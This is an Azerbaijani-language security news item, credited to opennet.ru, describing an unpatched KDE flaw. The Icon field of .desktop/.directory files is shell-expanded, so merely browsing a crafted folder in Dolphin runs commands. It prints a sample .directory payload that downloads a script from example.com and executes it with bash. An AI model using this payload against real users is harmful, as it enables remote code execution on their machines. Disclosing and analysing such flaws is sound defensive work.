KDE-də , istifadəçi xüsusi hazırlanmış “.desktop” və “.directory” faylları olan kataloqa və ya arxivə baxdıqda təcavüzkarın ixtiyari əmrləri yerinə yetirməsinə imkan verir. Hücum üçün istifadəçi sadəcə Dolphin fayl menecerində faylların siyahısına baxmaq, zərərli iş masası faylını yükləmək və ya qısayolu masaüstünə və ya sənədə çəkmək tələb edir. Problem kitabxanaların indiki buraxılışında özünü göstərir və KDE 4-ə qədər köhnə versiyalar. Zəiflik hələ də qalır (CVE təyin olunmayıb).
Problem KDesktopFile sinifinin düzgün tətbiq edilməməsi ilə əlaqədardır ki, o, “Icon” dəyişənini işləyərkən düzgün qaçış etmədən dəyəri KConfigPrivate::expandString() funksiyasına ötürür. “$(..)” sətirləri yerinə yetiriləcək əmrlər kimi . XDG spesifikasiyasının tələblərinə zidd olaraq həyata keçirilməsi qabıq konstruksiyaları parametrlərin növünü ayırmadan istehsal olunur, yəni. yalnız işə salınacaq tətbiqin əmr xəttini təyin edərkən deyil, həm də standart olaraq göstərilən nişanları təyin edərkən.
Məsələn, hücum etmək istifadəçiyə “.directory” faylı olan qovluğu olan zip arxivini göndərin:
[Masaüstü Giriş] Növ=Kataloq
İkon[$e]=$(wget${IFS}https://example.com/FILENAME.sh&&/bin/bash${IFS}FILENAME.sh)
Dolphin fayl menecerində arxivin məzmununa baxmağa çalışdığınız zaman https://example.com/FILENAME.sh skripti endiriləcək və icra ediləcək.
Mənbə: opennet.ru